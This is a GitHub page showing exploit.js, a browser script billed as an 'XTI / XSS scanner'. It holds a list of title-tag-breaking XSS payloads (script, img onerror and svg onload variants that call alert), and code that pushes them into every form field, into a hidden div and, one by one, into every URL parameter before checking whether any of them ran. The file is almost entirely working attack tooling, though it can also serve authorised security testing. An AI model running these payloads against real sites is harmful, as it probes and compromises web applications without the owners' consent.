-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.js
More file actions
102 lines (87 loc) · 3.58 KB
/
exploit.js
File metadata and controls
102 lines (87 loc) · 3.58 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
// █████ █████ ███████████ █████
// ░░███ ░░███ ░█░░░███░░░█░░███
// ░░███ ███ ░ ░███ ░ ░███
// ░░█████ ░███ ░███
// ███░███ ░███ ░███
// ███ ░░███ ░███ ░███
// █████ █████ █████ █████
// ░░░░░ ░░░░░ ░░░░░ ░░░░░
// === ADVANCED XTI / XSS SCANNER TOOL ===
// Step 0: Payloads (all start with </title>)
const payloads = [
`</title><script>alert('XTI')</script>`,
`</title><img src=x onerror=alert('XTI')>`,
`</title><svg onload=alert('XTI')>`,
`</title><script>console.log('XTI')</script>`
];
let xssTriggered = false;
// Step 1: Hook alert + console.log to detect execution
window.alert = function(msg) {
if (msg.includes('XTI')) {
xssTriggered = true;
console.warn('🚨 alert() triggered:', msg);
}
};
const originalConsoleLog = console.log;
console.log = function(...args) {
args.forEach(arg => {
if (typeof arg === 'string' && arg.includes('XTI')) {
xssTriggered = true;
console.warn('🚨 console.log() triggered by payload:', arg);
}
});
originalConsoleLog.apply(console, args);
};
// Step 2: Set up MutationObserver to detect injected DOM content
const observer = new MutationObserver(mutations => {
mutations.forEach(mutation => {
mutation.addedNodes.forEach(node => {
if (node.outerHTML && node.outerHTML.includes('XTI')) {
console.warn('🚨 DOM Mutation Detected:', node.outerHTML);
xssTriggered = true;
}
});
});
});
observer.observe(document.body, { childList: true, subtree: true });
// Step 3: Inject payload into all form fields
const inputs = document.querySelectorAll('input, textarea, select');
inputs.forEach(input => {
input.value = payloads[0];
});
console.log(`✅ Injected payload into ${inputs.length} form field(s)`);
// Step 4: Optional - visually inject payload (invisible div)
document.body.innerHTML += `<div style="opacity:0">${payloads[0]}</div>`;
// Step 5: Inject payloads into URL parameters one by one
const currentUrl = new URL(window.location.href);
const paramKeys = Array.from(currentUrl.searchParams.keys());
let phase = sessionStorage.getItem("xti_phase") || "payload";
let payloadIndex = parseInt(sessionStorage.getItem("xti_payload_index") || "0");
// PHASE 1: Inject payloads into URL parameters
if (phase === "payload" && paramKeys.length > 0) {
const currentPayload = payloads[payloadIndex];
paramKeys.forEach(key => currentUrl.searchParams.set(key, currentPayload));
sessionStorage.setItem("xti_payload_index", payloadIndex + 1);
if (payloadIndex < payloads.length) {
console.log(`🚀 Injecting payload #${payloadIndex + 1}:`, currentPayload);
window.location.href = currentUrl.toString();
} else {
// Step 6: Final Eval + Cleanup
setTimeout(() => {
const source = document.documentElement.outerHTML;
if (source.includes('</title>')) {
console.log("✅ Reflection detected.");
} else {
console.log("❌ No reflection of payload.");
}
if (!xssTriggered) {
console.log("❌ Payloads did not execute.");
}
sessionStorage.removeItem("xti_phase");
sessionStorage.removeItem("xti_payload_index");
sessionStorage.removeItem("xti_template_injected");
observer.disconnect();
console.log = originalConsoleLog;
}, 1500);
}
}